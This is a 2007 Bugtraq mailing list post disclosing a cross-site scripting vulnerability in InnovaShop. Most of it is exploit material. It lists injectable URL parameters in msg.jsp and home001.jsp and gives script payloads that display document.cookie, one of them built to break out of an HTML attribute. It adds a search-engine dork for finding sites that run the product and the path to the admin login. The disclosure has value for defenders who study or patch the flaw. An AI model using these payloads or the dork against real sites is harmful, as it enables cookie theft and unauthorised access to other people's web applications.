Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

InnovaShop™® (mgs.jps) Cross Siting Scripting

From: jose luis góngora fernández <sys-project () hotmail com>
Date: Mon, 15 Oct 2007 18:55:53 +0000
# InnovaShop™® (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge™®" / "Powered by InnovaPortal©"
# Stop lammer

# Exploit In (XSS):

http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...

# Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

# Admin Login:

http://server/admin/

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil.
Previous By Date Next
Previous By Thread Next

Current thread: